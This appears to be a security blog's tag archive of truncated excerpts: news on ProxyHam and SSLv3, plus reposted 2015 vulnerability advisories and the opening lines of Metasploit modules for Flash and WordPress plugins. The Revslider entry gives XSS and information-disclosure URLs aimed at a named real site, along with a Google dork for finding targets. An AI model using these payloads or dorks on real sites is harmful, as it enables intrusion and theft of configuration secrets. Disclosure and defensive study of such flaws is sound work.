Tag archive: sicurezza


ProxyHam, for browsing the Internet anonymously

The open source device connects to Wi-Fi and relays a user's Internet connection over a radio link to a computer 1,600 to 4,000 meters away. A setup in which the anonymous user stays safely at home, more than 1,600 meters from his IP address. It is ProxyHam, a "hardware proxy" […]


That shot you heard? SSLv3 is now DEAD

We really, really, really mean it this time: take SSL3 and bury it. That's the message from the home of all things Internet, the Internet Engineering Task Force, which has issued the "take it behind the shed" edict in this RFC. It's actually only formalising what the IETF and industry already knew: SSLv3 is ancient […]


Adobe Flash Player Drawing Fill Shader Memory Corruption

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'Adobe Flash Player Drawing Fill Shader Memory Corruption',
      'Description' => %q{
        This module exploits a memory corruption happening when applying a Shader as […]


WordPress WP-Instance-Rename 1.0 File Download

Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration […]


WordPress Nextend Twitter Connect 1.5.1 Cross Site Scripting

Wordpress "Nextend Twitter Connect"
===================================

Document Title:
===============
WordPress "Nextend Twitter Connect" Plugin Version: 1.5.1 is vulnerable to Reflected XSS (Cross Site Scripting)

Download URL:
=============
https://wordpress.org/plugins/nextend-twitter-connect/

Release Date:
=============
2015-06-20

Vulnerability CVE ID:
=====================
CVE-2015-4557

Vulnerability Disclosure Timeline:
==================================
2015-06-15 First […]


WordPress Front-end Editor File Upload

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'        => 'Wordpress Front-end Editor File Upload',
      'Description' => %q{
        The Wordpress Front-end Editor plugin contains an authenticated file upload […]


WordPress Revslider 4.2.2 XSS / Information Disclosure

| # Title : WordPress Revslider 4.2.2 Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
| # Tested on: windows 8.1 Français V.(Pro)
| # Download : http://revolution.themepunch.com/
=======================================

XSS :

http://www.codekom.com//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka..Give%20me%20your%20wp-config.php

information Disclosure :

http://www.codekom.com/wp-content/plugins/revslider/revslider_admin.php

http://www.codekom.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

Arbitrary File Download […]


WordPress Google Analyticator 6.4.9.3 CSRF

# Title: Cross-Site Request Forgery in Google Analyticator Wordpress Plugin v6.4.9.3 before rev @1183563
# Submitter: Nitin Venkatesh
# Product: Google Analyticator Wordpress Plugin
# Product URL: https://wordpress.org/plugins/google-analyticator/
# Vulnerability Type: Cross-Site Request Forgery [CWE-352]
# Affected Versions: v6.4.9.3 before rev @1183563 and possibly earlier
# Tested versions: v6.4.9.3 rev @1168849
# Fixed Version: v6.4.9.3 […]


WordPress NewStatPress 0.9.8 Cross Site Scripting / SQL Injection

# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. – adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063

Vulnerabilities (2)
=====================

(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------

* CODE: includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) […]